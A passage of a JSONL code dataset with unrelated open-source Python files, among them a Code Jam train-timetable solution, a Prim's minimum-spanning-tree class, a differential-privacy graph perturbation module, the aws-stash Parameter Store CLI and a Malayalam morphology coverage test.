rootDir + '/arcasHLA', 'customize', \n '--subject {//}',\n '--genotype {/}',\n '--resolution', args.resolution,\n '--grouping', args.grouping,\n '--transcriptome', args.transcriptome,\n '--outdir', outdir + '/{//}',\n '--temp', temp + '/{//}']\n \n if args.verbose: command.append('--verbose')\n \n print(' '.join([str(i) for i in command]))\n run_command(command)\n \n if not args.keep_files: run_command(['rm -rf', temp])\n \n else:\n genotype = process_str_genotype(args.genotype, genes)\n \n build_custom_reference(args.subject, genotype, args.grouping, args.transcriptome, temp)\n \n\n#-----------------------------------------------------------------------------\n","repo_name":"RabadanLab/arcasHLA","sub_path":"scripts/customize.py","file_name":"customize.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"63"} 
+{"seq_id":"71154271882","text":"from LMS.Common.LMS_Block import LMS_Block\r\nfrom LMS.Stream.Reader import Reader\r\nfrom LMS.Common.LMS_Enum import LMS_Types\r\n\r\n\r\nclass TGP2:\r\n \"\"\"A class that represents a TGP2 block in a MSBT file.\r\n\r\n https://github.com/kinnay/Nintendo-File-Formats/wiki/MSBP-File-Format#tgp2-block\"\"\"\r\n\r\n def __init__(self):\r\n self.block: LMS_Block = LMS_Block()\r\n self.parameters: list[dict] = []\r\n\r\n def read(self, reader: Reader) -> None:\r\n \"\"\"Reads the TGP2 block from a stream.\r\n\r\n :param `reader`: A Reader object.\"\"\"\r\n self.block.read_header(reader)\r\n\r\n parameter_count = reader.read_uint16()\r\n reader.skip(2)\r\n # Read the parameters\r\n for offset in self.block.get_item_offsets(reader, parameter_count):\r\n parameter = {}\r\n reader.seek(offset)\r\n type = LMS_Types(reader.read_uint8())\r\n parameter[\"type\"] = type\r\n\r\n if type != LMS_Types.list_index:\r\n parameter[\"name\"] = reader.read_string_nt()\r\n self.parameters.append(parameter)\r\n continue\r\n\r\n reader.skip(1)\r\n list_count = reader.read_uint16()\r\n parameter[\"item_indexes\"] = [\r\n reader.read_uint16() for _ in range(list_count)\r\n ]\r\n parameter[\"name\"] = reader.read_string_nt()\r\n\r\n self.parameters.append(parameter)\r\n\r\n self.block.seek_to_end(reader)\r\n","repo_name":"AbdyyEee/PylibMS","sub_path":"LMS/Project/TGP2.py","file_name":"TGP2.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"29511703737","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Contest: Google Code Jam - 2008 Qualification\n# Problem: B. Train Timetable\n# URL: https://code.google.com/codejam/contest/32013/dashboard#s=p1\n# Author: Masatoshi Ohta\n# Strategy:\n# 貪欲法 (Greedy Algorithm) で地道に実装するだけ。\n# 出発時間の早い順番に列車を出発させていく。\n# このとき、その駅に利用可能な電車がある場合は、その電車を再利用できるため、\n# その駅からの出発カウントはインクリメントしない。\n# 列車を出発させたら、到着先の駅に、利用可能な列車としてキューイングしておく。\nimport sys\nimport heapq\ndef read_int(): return int(sys.stdin.readline())\ndef read_ints(): return [int(x) for x in sys.stdin.readline().split()]\ndef read_strs(): return sys.stdin.readline().split()\n\ndef calc_minutes(hhmm):\n \"\"\"Convert 'HH:MM' to minutes\"\"\"\n return int(hhmm[:2]) * 60 + int(hhmm[3:])\n\ndef solve():\n # Read a problem\n turnaround_time = read_int()\n NA, NB = read_ints()\n\n table = []\n for i in range(NA):\n a = read_strs()\n table.append([calc_minutes(a[0]), calc_minutes(a[1]), 0])\n for i in range(NB):\n a = read_strs()\n table.append([calc_minutes(a[0]), calc_minutes(a[1]), 1])\n table.sort()\n\n start_count = [0, 0] # Result\n available = [[], []] # [ready at A, ready at B]\n for next_train in table:\n pos = next_train[2]\n if available[pos] and available[pos][0] <= next_train[0]:\n # Train is ready\n heapq.heappop(available[pos])\n else:\n # Need to start a new train\n start_count[pos] += 1\n # Modify available trains\n heapq.heappush(available[1-pos], next_train[1] + turnaround_time)\n\n return start_count\n\nif __name__ == '__main__':\n T = read_int()\n for i in range(T):\n print('Case #{}: '.format(i+1) + ' '.join(map(str, solve())))\n","repo_name":"maku77/contest","sub_path":"codejam/2008_Qualification/B-TrainTimetable.py","file_name":"B-TrainTimetable.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39616855680","text":"\nimport heapq\n\nclass Edge:\n def __init__(self, 
weight, start_vertex, end_vertex):\n self.weight = weight\n self.start_vertex = start_vertex\n self.end_vertex = end_vertex\n\n def __lt__(self, other):\n return self.weight < other.weight\n\nclass Node:\n def __init__(self, name):\n self.name = name\n self.visited = False\n self.adj_list = []\n\n\nclass Prim_Jarnik:\n def __init__(self, vertex_list):\n self.vertex_list = vertex_list\n self.heap = []\n\n\n def find_minimum_spanning_tree(self, start_vertex):\n result_edges = []\n visited_nodes = 0\n total_cost = 0\n\n current_node = start_vertex\n current_node.visited = True\n visited_nodes += 1\n while visited_nodes < len(self.vertex_list):\n for edge in current_node.adj_list:\n if not edge.end_vertex.visited:\n heapq.heappush(self.heap, edge)\n\n min_edge = heapq.heappop(self.heap)\n min_edge.end_vertex.visited = True\n total_cost += min_edge.weight\n visited_nodes += 1\n current_node = min_edge.end_vertex\n result_edges.append(min_edge)\n\n return result_edges, total_cost\n\n\n\n\n","repo_name":"morningbob/algorithms_python","sub_path":"general_algorithms/PrimJarnik/PrimJarnik.py","file_name":"PrimJarnik.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70229809480","text":"#!/usr/bin/python3\n\"\"\"a script that list all states from the database hbtn_0e_0_usa\"\"\"\nimport MySQLdb\nfrom sys import argv\n\n\ndef main():\n \"\"\"a module for setting up DB connection\"\"\"\n host = 'localhost'\n usr = argv[1]\n pwd = argv[2]\n db = argv[3]\n pt = 3306\n\n myDB = MySQLdb.connect(\n host=host,\n user=usr,\n passwd=pwd,\n database=db,\n port=pt\n )\n myDB_cursor = myDB.cursor()\n myquery = (\"SELECT cities.id, cities.name, states.name \"\n \"FROM cities \"\n \"JOIN states \"\n \"ON cities.state_id = states.id \"\n \"ORDER BY cities.id ASC\")\n try:\n myDB_cursor.execute(myquery)\n except Exception:\n return\n\n result = myDB_cursor.fetchall()\n\n for row in result:\n print(row)\n\n myDB_cursor.close()\n myDB.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yusuf-R/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/4-cities_by_state.py","file_name":"4-cities_by_state.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"70909798600","text":"import torch\nimport numpy as np\nfrom torch_sparse import SparseTensor\n\n\nclass AsymmetricRandResponse:\n def __init__(self, eps: float):\n self.eps_link = eps * 0.9\n self.eps_density = eps * 0.1\n\n def __call__(self, adj_t: SparseTensor, chunk_size: int=1000) -> SparseTensor:\n chunks = self.split(adj_t, chunk_size=chunk_size)\n pert_chunks = []\n\n for chunk in chunks: \n chunk_pert = self.perturb(chunk)\n pert_chunks.append(chunk_pert)\n\n perturbed_adj_t = self.merge(pert_chunks, chunk_size=chunk_size)\n return perturbed_adj_t\n \n def split(self, adj_t: SparseTensor, chunk_size: int) -> list[SparseTensor]:\n chunks = []\n for i in range(0, adj_t.size(0), chunk_size):\n if (i + chunk_size) <= adj_t.size(0):\n chunks.append(adj_t[i:i+chunk_size])\n else:\n chunks.append(adj_t[i:])\n return chunks\n \n def perturb(self, adj_t: SparseTensor) -> SparseTensor:\n n = adj_t.size(1)\n sensitivity = 1 / (n*n)\n p = 1 / (1 + np.exp(-self.eps_link))\n d = np.random.laplace(loc=adj_t.density(), scale=sensitivity/self.eps_density)\n q = d / (2*p*d - p - d + 1)\n q = min(1, q)\n pr_1to1 = p * q\n pr_0to1 = (1 - 
p) * q\n mask = adj_t.to_dense(dtype=bool)\n out = mask * pr_1to1 + (~mask) * pr_0to1\n torch.bernoulli(out, out=out)\n out = SparseTensor.from_dense(out, has_value=False)\n return out\n \n def merge(self, chunks: list[SparseTensor], chunk_size: int) -> SparseTensor:\n n = (len(chunks) - 1) * chunk_size + chunks[-1].size(0)\n m = chunks[0].size(1)\n row = torch.cat([chunk.coo()[0] + i * chunk_size for i, chunk in enumerate(chunks)])\n col = torch.cat([chunk.coo()[1] for chunk in chunks])\n out = SparseTensor(row=row, col=col, sparse_sizes=(n, m))#.coalesce()\n return out\n","repo_name":"thupchnsky/dp-gnn","sub_path":"core/privacy/algorithms/graph/arr.py","file_name":"arr.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"7510347075","text":"from PySide6.QtCore import QObject, Signal, QMutex, QThread\n\n\nlock = QMutex()\n\nclass TaskWorker(QObject):\n range_requested = Signal(int)\n\n def __init__(self):\n super().__init__()\n\n def range_proc(self):\n self.signal = True\n while self.signal:\n self.range_requested.emit(())\n QThread.msleep(80)\n","repo_name":"ieew/vuvu-practise","sub_path":"ui/Thread.py","file_name":"Thread.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10103835326","text":"from .AccountManager import AccountManager\n\n\nclass GlobalInfo:\n def __init__(self):\n self.accountManager = AccountManager()\n self.server_info = {}\n self.question_publisher = None\n self.answer_service = None\n self.game_engine = None\n self.pnl_service = None\n self.mode = 'test' # test final\n self.logger = None\n self.dump_prefix = '/tmp/contest.dump.'\n self.update_interval = 5 # seconds\n","repo_name":"jk983294/Explore","sub_path":"ContestPlatform/contest/server/GlobalInfo.py","file_name":"GlobalInfo.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70073415881","text":"computerScience=[]\r\nnetworking=[]\r\ndesktopSupport=[]\r\nsoftwareProgramming=[]\r\ncomputerSales=[]\r\nacceptedStudents=[computerScience,computerSales,networking,desktopSupport,softwareProgramming]\r\n\r\n\r\nprint(\"###############################################################\")\r\nprint(\"WELCOME TO IT SYSTEMS ACADEMY\")\r\nprint(\"###############################################################\")\r\n#Personal Details\r\nfirstName=input(\"Enter your first name\")\r\nlastName=input(\"Enter your last name\")\r\nage=int(input(\"Enter your age\"))\r\nidNumber=input(\"Enter your id number\")\r\nemailAddress=input(\"Enter your email\")\r\nphoneNumber=input(\"Enter your phone number\")\r\nhomeAddress=input(\"Enter your home address\")\r\n\r\n#Programmes you interested in\r\nprint(\"##############################################################\")\r\nprint(\"We offer the following programmes:\",\"\\n Computer Science \\n Networking \\n Desktop Support \\n Software Programming \\n Computer Sales\")\r\n\r\n#Qualifications\r\n#Prompt the user to enter his grade high school grades\r\nmathsScore=input(\"Enter your Mathematics score\")\r\nfullName= firstName + lastName\r\nwelcomeMessage=\"Hello\"+fullName+\",you have been accepted to study\"\r\n\r\nif mathsScore ==\"A\" :\r\n computerScience.append(fullName)\r\n print(welcomeMessage,\" Computer Science at IT Systems\")\r\nelif mathsScore ==\"B\":\r\n 
softwareProgramming.append(fullName)\r\n print(welcomeMessage,\" Software Programming at IT Systems\")\r\nelif mathsScore ==\"C\":\r\n networking.append(fullName)\r\n print(welcomeMessage,\" Networking at IT Systems\")\r\nelif mathsScore ==\"D\":\r\n desktopSupport.append(fullName)\r\n print(welcomeMessage,\" Desktop Support at IT Systems\")\r\nelif mathsScore==\"E\":\r\n computerSales.append(fullName)\r\n print(welcomeMessage,\" Computer Sales at IT Systems\")\r\nelse:\r\n print(\"Unfortunately\",fullName,\" your application wasn't successfully better luck next time\")\r\n","repo_name":"ezzycodes/college_enrollment","sub_path":"enroll.py","file_name":"enroll.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"358202042","text":"from Viewer.viewer import SimpleViewer\nfrom Dataset.SOT.Storage.MemoryMapped.dataset import SingleObjectTrackingDatasetSequence_MemoryMapped\nfrom evaluation.SOT.util.simple_sequence_prefetcher import get_simple_sequence_data_prefetcher\nfrom tqdm import tqdm\nfrom data.operator.bbox.spatial.xyxy2xywh import bbox_xyxy2xywh\n\n\nclass SequenceRunner:\n def __init__(self, tracker, sequence: SingleObjectTrackingDatasetSequence_MemoryMapped):\n self.tracker = tracker\n self.sequence = sequence\n assert len(sequence) > 1\n\n def __iter__(self):\n self.index = 0\n self.sequence_data_iter = iter(get_simple_sequence_data_prefetcher(self.sequence))\n return self\n\n def __next__(self):\n image, groundtruth_bounding_box = next(self.sequence_data_iter)\n if self.index == 0:\n self.tracker.initialize(image, groundtruth_bounding_box)\n predicted_bounding_box = groundtruth_bounding_box.tolist()\n else:\n predicted_bounding_box, _ = self.tracker.track(image)\n self.index += 1\n return (image.permute(1, 2, 0), bbox_xyxy2xywh(groundtruth_bounding_box.tolist()), bbox_xyxy2xywh(predicted_bounding_box))\n\n\nclass VisibleTrackerRunner:\n def __init__(self, tracker):\n self.tracker = tracker\n self.viewer = SimpleViewer()\n # self.viewer.switch_backend()\n\n def run(self, sequence: SingleObjectTrackingDatasetSequence_MemoryMapped):\n assert isinstance(sequence, SingleObjectTrackingDatasetSequence_MemoryMapped)\n\n with tqdm(total=len(sequence)) as process_bar:\n process_bar.set_description_str(sequence.get_name())\n runner = SequenceRunner(self.tracker, sequence)\n\n for index_of_frame, (image, groundtruth_bounding_box, predicted_bounding_box) in enumerate(runner):\n self.viewer.clear()\n self.viewer.drawImage(image)\n self.viewer.drawBoundingBox(groundtruth_bounding_box)\n if index_of_frame != 0:\n self.viewer.drawBoundingBox(predicted_bounding_box, (0, 1, 0))\n self.viewer.update()\n # self.viewer.waitKey()\n self.viewer.pause(0.0001)\n process_bar.update()\n\n self.viewer.waitKey()\n\n\ndef visualize_tracking_procedure_on_datasets(tracker, datasets):\n visualizer = VisibleTrackerRunner(tracker)\n for dataset in datasets:\n for sequence in dataset:\n visualizer.run(sequence)\n\n\ndef visualize_tracking_procedure_on_standard_datasets(tracker):\n from evaluation.SOT.runner import get_standard_evaluation_datasets\n visualize_tracking_procedure_on_datasets(tracker, get_standard_evaluation_datasets())\n","repo_name":"LitingLin/ubiquitous-happiness","sub_path":"evaluation/SOT/visualization/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} 
+{"seq_id":"320560957","text":"import logging\nimport asyncio\nfrom hbmqtt.client import MQTTClient, ClientException\nfrom hbmqtt.mqtt.constants import QOS_0\n\nfrom time import gmtime, strftime\nfrom datetime import datetime\n\nimport re,json\n\nimport water_log_store as store\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n#topics will contain the sensor id for now something like version/deviceid123/dataLabel -- less verbose is more managable\n#so for instance alpha/alpha_deviceid123/temp\n\nTOPIC = 'ALPHA/+/TEMP'\nBROKER = 'mqtt://192.168.0.100'\nMQTT_PORT = '4444'\n\n@asyncio.coroutine\ndef subscriber_coro():\n C = MQTTClient()\n\n #mqtt[s]://[username][:password]@host.domain[:port]\n\n yield from C.connect(BROKER+':'+MQTT_PORT)\n yield from C.subscribe([(TOPIC,QOS_0)])\n\n print(C.client_id)\n while True:\n try:\n message = yield from C.deliver_message()\n\n logger.debug(message.__dict__)\n\n packet = message.publish_packet\n\n sensor_id = re.split('_|/',packet.variable_header.topic_name)[-2]\n ts = message.publish_packet.protocol_ts\n data = str(packet.payload.data,\"utf-8\")\n\n logger.debug(\"%s => %s => %s\" % (packet.variable_header.topic_name, str(packet.payload.data,\"utf-8\"), strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())))\n\n message_data = dict([(\"sensor_id\",sensor_id),(\"temperature\",data),(\"time_stamp\",ts.isoformat())])\n data_json = json.dumps(message_data)\n # print(data_json)\n store.handle_microgreens_data(data_json)\n\n except Error as ce:\n logger.error(\"trigger disconnet: \", ce)\n break\n\n yield from C.unsubscribe([(TOPIC,QOS_0)])\n logger.info(\"UnSubscribed\")\n yield from C.disconnect()\n\nif __name__ == '__main__':\n formatter = \"[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n logging.basicConfig(level=logging.INFO, format=formatter)\n asyncio.get_event_loop().run_until_complete(subscriber_coro())\n","repo_name":"withattribution/waterlog","sub_path":"water_subscriber.py","file_name":"water_subscriber.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34599109909","text":"from somajo import SoMaJo\nimport os\nimport re\n\nINPUT_FILE = \"/home/phmay/data/ml-data/gtt/german-dbmdz-corpus-unsplitted-parts/opensubtitles.txt\"\nOUTPUT_FILE = \"opensub_clean.txt\"\n\nprefix_patten = re.compile('^- ')\npostfix_pattern = re.compile('--$')\n\nif __name__ == '__main__':\n new_line = re.sub(postfix_pattern, '', '- test prefix.--')\n with open(INPUT_FILE, \"r\") as input_file, \\\n open(OUTPUT_FILE, \"w\") as output_file:\n for line in input_file:\n if line.startswith('[') or line.startswith('('):\n continue\n line = line.strip()\n line = re.sub(prefix_patten, '', line)\n line = re.sub(postfix_pattern, '', line)\n if len(line) > 15:\n output_file.write(line + '\\n')\n","repo_name":"German-NLP-Group/german-transformer-training","sub_path":"src/process_opensubtitles_files.py","file_name":"process_opensubtitles_files.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"63"} +{"seq_id":"30982988552","text":"import regex\nimport os\nimport unittest\nimport glob\nfrom time import perf_counter as clock\nfrom mlmorph import Analyser, tokenize\n\n\nCURR_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))\nMIN_COVERAGE = 57.10\n\n\ndef is_valid_malayalam_word(word):\n word = word.strip()\n if (len(word) <= 1):\n return False\n 
# Ignore all non-Malayalam words\n if regex.search(r\"[\\u0D00-\\u0D7F\\u200C-\\u200D]+\", word) is None:\n return False\n return True\n\n\nclass CoverageTests(unittest.TestCase):\n analyser = Analyser()\n\n def test_total_coverage(self):\n total_tokens_count = 0\n total_analysed_tokens_count = 0\n start = clock()\n print(\"%40s\\t%8s\\t%8s\\t%s\" %\n ('File name', 'Words', 'Analysed', 'Percentage'))\n for filename in glob.glob(os.path.join(CURR_DIR, \"coverage\", \"*.txt\")):\n with open(filename, 'r') as file:\n tokens_count = 0\n analysed_tokens_count = 0\n for line in file:\n for word in tokenize(line):\n if not is_valid_malayalam_word(word):\n continue\n tokens_count += 1\n analysis = self.analyser.analyse(word, False)\n if len(analysis) > 0:\n analysed_tokens_count += 1\n percentage = (analysed_tokens_count/tokens_count)*100\n total_tokens_count += tokens_count\n total_analysed_tokens_count += analysed_tokens_count\n print(\"%40s\\t%8d\\t%8d\\t%3.2f%%\" % (os.path.basename(\n filename), tokens_count, analysed_tokens_count, percentage))\n file.close()\n percentage = (total_analysed_tokens_count/total_tokens_count)*100\n time_taken = clock() - start\n print('%40s\\t%8d\\t%8d\\t%3.2f%%' %\n ('Total', total_tokens_count, total_analysed_tokens_count, percentage))\n print('Time taken: %5.3f seconds' % (time_taken))\n self.assertTrue(percentage >= MIN_COVERAGE,\n 'Coverage decreased from %3.2f to %3.2f' % (MIN_COVERAGE, percentage))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smc/mlmorph","sub_path":"tests/coverage-test.py","file_name":"coverage-test.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"63"} +{"seq_id":"32852646155","text":"from MongoConnect import ConnectModule\nmy_con = ConnectModule.connect()\ncollection = my_con.db[\"Address\"]\n\n\nclass UpdateAddress:\n def __init__(self, up_register_id, up_house_num, up_street, up_city, up_district, up_state, up_pincode):\n self.up_register_id = up_register_id\n self.up_house_num = up_house_num\n self.up_street = up_street\n self.up_city = up_city\n self.up_district = up_district\n self.up_state = up_state\n self.up_pincode = up_pincode\n\n def update_add(self):\n newdata = {\"$set\": {\n \"House number \": self.up_house_num,\n \"Street \": self.up_street,\n \"City \": self.up_city,\n \"District\": self.up_district,\n \"State\": self.up_state,\n \"Pin Code\": self.up_pincode\n }\n }\n return collection.update({\"Registration Id\": self.up_register_id}, newdata)\n","repo_name":"hcmuleva/personal-profile","sub_path":"lms_aaditya/Address/AddressModules/update_address.py","file_name":"update_address.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40090701708","text":"#! 
/usr/bin/env python\n# 3.7\n\nfrom collections import deque\n\nclass BFSResult:\n\tdef __init__(self):\n\t\tself.level = {}\n\t\tself.parent = {}\n\t\n\tdef __repr__(self):\n\t\tnode_str = f'{self.__class__.__name__} levels - node in level\\n'\n\t\tfor n in self.level.keys():\n\t\t\tnode_str += f\"{n.name} \".rjust(22)\n\t\t\ttry:\n\t\t\t\tnode_str += f\"{str(self.level[n])} - {self.parent[n]}\"\n\t\t\texcept:\n\t\t\t\tnode_str += f\"{str(self.level[n])} - None\"\t\t\t\n\t\t\tnode_str += \"\\n\"\n\t\treturn node_str\t\t\t\n\nclass Graph:\n\tdef __init__(self):\n\t\tself.adj = {}\n\n\tdef add_edge(self, u, v):\n\t\t#if self.adj[u] is None:\n\t\tif u not in self.adj:\n\t\t\tself.adj[u] = []\n\t\t\t\n\t\tif v not in self.adj[u]:\n\t\t\tself.adj[u].append(v)\n\t\n\tdef __repr__(self):\n\t\tnode_str = f'{self.__class__.__name__} nodes - adjacency lists\\n'\n\t\tfor n in self.adj.keys():\n\t\t\tnode_str += f\"{n} \".rjust(22)\n\t\t\tnode_str += ','.join([item.name for item in self.adj[n]])\n\t\t\tnode_str += \"\\n\"\n\t\treturn node_str\n\n# Matrix representation\n# A B C D E\n# A 1 1 \n# B\n# C\n# D\n# E\n\n\nclass Node:\n\tdef __init__(self, name):\n\t\tself.name = name\n\tdef __repr__(self):\t\t\t\t\t# so networkx displays meaningful name on the node!\n\t\treturn self.name\n\ndef bfs(g, s):\n\t'''\n\tQueue-based implementation of BFS.\t\t\n\tArgs:\n\tg: a graph with adjacency list adj such that g.adj[u] is a list of u's\n\tneighbors.\n\ts: source.\n\t'''\n\tr = BFSResult()\n\tr.parent = {s: None}\n\tr.level = {s: 0}\n\ts.level = 0\n\t\n\tqueue = deque()\n\tqueue.append(s)\n\n\twhile queue:\n\t\tu = queue.popleft()\n\t\tfor n in g.adj[u]:\n\t\t\tif n not in r.level:\n\t\t\t\tr.parent[n] = u\n\t\t\t\tn.parent = u \t\t\t\t\t# maze\n\t\t\t\tr.level[n] = r.level[u] + 1\n\t\t\t\tn.level = r.level[n] \t\t\t# maze\n\t\t\t\tqueue.append(n)\n\n\treturn r\n\n\n\nif __name__ == '__main__':\n\tfrom pathlib import Path\n\tfrom pprint import pprint\n\timport re\n\timport random\n\tDATAFILE = Path('./scratch/food.txt')\n\t# to draw graph\n\timport networkx as nx\n\t# https://github.com/networkx/networkx\n\t# https://networkx.org/documentation/stable/tutorial.html\n\t# https://networkx.org/documentation/stable/reference/drawing.html#drawing\n\timport matplotlib.pyplot as plt\n\t\n\t# TODO try\n\t# https://graph-tool.skewed.de/\n\t# https://graph-tool.skewed.de/static/doc/quickstart.html\n\n\tG = nx.Graph()\n\t\n\t# # create list random names\n\t# with open(DATAFILE,'r') as f:\n\t# \ttext = f.read()\n\t# \n\t# names = []\n\t# count = 0\n\t# for match in re.findall(r'information (.*?) 
\\(', text, flags = re.MULTILINE | re.DOTALL):\n\t# \tr = random.randint(0,9)\n\t# \tcount += 1\n\t# \tif r % 5 == 0:\n\t# \t\tprint(f\"{r}- {match}\")\n\t# \t\tnames.append(match)\n\t# \tif len(names) >30:\n\t# \t\tbreak\n\t# \t\t\n\t# print(count)\n\t# pprint(names)\n\t\n\t# create graph\t\n\tnode_names = ['semolina','hazelnut choc','picos blue',\n\t\t\t\t 'kaffir lime leaves','focaccia','tagliatelle','worcester sauce','maris piper potatoes',\n\t\t\t\t 'capers','roast lamb leg','salmon','salmon skirt','black fungus','sbs olive spread','scampi',\n\t\t\t\t 'soho tiger prawns','trout','haricot beans','oregano','xantham gum','octopus','rhubarb',\n\t\t\t\t 'green tabasco','white twix','cashew nuts','bran flakes','basa','porcinini mushrooms',\n\t\t\t\t 'haggis','halloumi']\n\t\n\tnodes = []\n\tfor i in node_names:\n\t\tnode_to_add = Node(i) \n\t\tnodes.append(node_to_add)\t\t\n\t\tG.add_node(node_to_add)\t\t\t\t\t\t\t\t# graphics representation\n\t\n\tC_LOW = 1\t# 5\n\tC_HIGH = 3\t# 15\n\t\n\tg = Graph()\n\tfor i in nodes:\n\t\t# connect each node to at least 5 other nodes\n\t\tconnections = random.randint(C_LOW,C_HIGH)\n\t\tfor c in range(connections):\n\t\t\trand_edge = random.randint(0,len(node_names)-1)\n\t\t\tg.add_edge(i,nodes[rand_edge])\n\t\t\tG.add_edge(i,nodes[rand_edge])\t\t\t\t\t# graphics representation\n\t\t\n\tpprint(g)\n\t\n\tsource_node = nodes[random.randint(0,len(node_names)-1)] \n\tbfs_result = bfs(g, source_node)\n\t\n\tpprint(bfs_result)\n\t\n\tprint(f\"Start node: {source_node.name}\")\n\n\tnx.draw(G, with_labels=True) # , font_weight='bold')\n\tplt.show()\n\t","repo_name":"UnacceptableBehaviour/algorithms","sub_path":"algos/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72498877319","text":"# -*- coding: utf-8 -*-\n\n# The maximum length for the fully qualified parameter name is 1011 characters.\n# A hierarchy can have a maximum of 15 levels.\n# The maximum length for the string value is 4096.\n\nfrom aws_stash import __project_name__, __version__\n\nimport sys\n\nfrom aws_stash.ParamStore import ParamStore\nfrom aws_stash.Output import Output\n\n\ndef main():\n def valid_path(value):\n if value is None:\n return value\n import re\n pattern = '^/(([A-Za-z0-9-_.]+)/?)*$'\n if not re.match(pattern, value):\n raise argparse.ArgumentTypeError(\n \"{0} is an invalid path, must match pattern '{1}'' \".format(value, pattern))\n return value\n\n import argparse\n import itertools\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__), help='Show version')\n parser.add_argument('path', type=valid_path,\n help='Path to the parameter key or folder containing parameter keys')\n parser.add_argument('-p', '--params', nargs='+',\n action='append', default=[], help='Parameter keys')\n parser.add_argument('-w', '--write', nargs='?', const='',\n help='Write parameter value, leave it empty to input it from STDIN')\n parser.add_argument('-m', '--multi-line', action='store_true',\n help='Accept multi-line value from STDIN, end input with CTRL+D')\n parser.add_argument('-f', '--force', action='store_true',\n help='Force overwrite existing value')\n parser.add_argument('-d', '--description', default=None,\n help='Add a description to the parameter')\n parser.add_argument('-k', '--kms', default='aws/ssm',\n help='KMS key alias to encrypt the value')\n parser.add_argument('-c', 
'--copy', action='store_true',\n help='Copy value to the clipboard instead of showing it')\n parser.add_argument('-o', '--output', choices=['text', 'json', 'export'],\n default='text', help='Output format')\n parser.add_argument('-l', '--list', action='store_true',\n help='List all parameters under same level path')\n parser.add_argument('-r', '--recursive', action='store_true',\n help='Process all parameters recursively starting from path')\n parser.add_argument('--delete', action='store_true',\n help='Delete a single parameter or all parameters recursively starting from path if using --recursive')\n parser.add_argument('-q', '--quiet', action='store_true',\n help='Output only the values of the parameters')\n parser.add_argument('--full', action='store_true',\n help='Output fully qualified parameter path')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Output parameters details')\n parser.add_argument('--find-in-parents', action='store_true',\n help='Find a key in parent folders')\n\n args = parser.parse_args()\n\n args.params = list(set(itertools.chain.from_iterable(args.params)))\n\n param_store = ParamStore()\n output = Output()\n\n if args.write is not None:\n version = param_store.write_parameter(\n path=args.path,\n value=args.write,\n description=args.description,\n force=args.force,\n multi_line=args.multi_line,\n kms=args.kms\n )\n if version is None:\n sys.exit(1)\n if not args.quiet:\n print('Version: {}'.format(version))\n\n elif args.delete:\n version = param_store.delete_parameters(\n path=args.path,\n recursive=args.recursive\n )\n\n else:\n if args.list:\n parameters = param_store.list_parameters(\n path=args.path,\n recursive=args.recursive,\n params=args.params,\n verbose=args.verbose\n )\n else:\n parameters = param_store.get_parameters(\n path=args.path,\n params=args.params,\n find_in_parents=args.find_in_parents,\n verbose=args.verbose\n )\n\n if len(parameters):\n output.output(args, parameters)\n if not len(parameters) or (\n args.params and len(parameters) != len(args.params)):\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"askainet/aws-stash","sub_path":"aws_stash/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"35262458444","text":"\"\"\"Expected Improvement calculation for one or more objectives.\"\"\" \n\nimport logging\ntry:\n from numpy import exp, abs, pi\nexcept ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n_check = ['numpy']\ntry:\n from math import erf # py27 and later has erf in the math module\nexcept ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n try:\n from scipy.special import erf\n except ImportError as err:\n logging.warn(\"In %s: %r\" % (__file__, err))\n _check.append('scipy')\n\nfrom openmdao.main.datatypes.api import Slot, Str, Float\nfrom openmdao.lib.casehandlers.api import CaseSet\n\nfrom 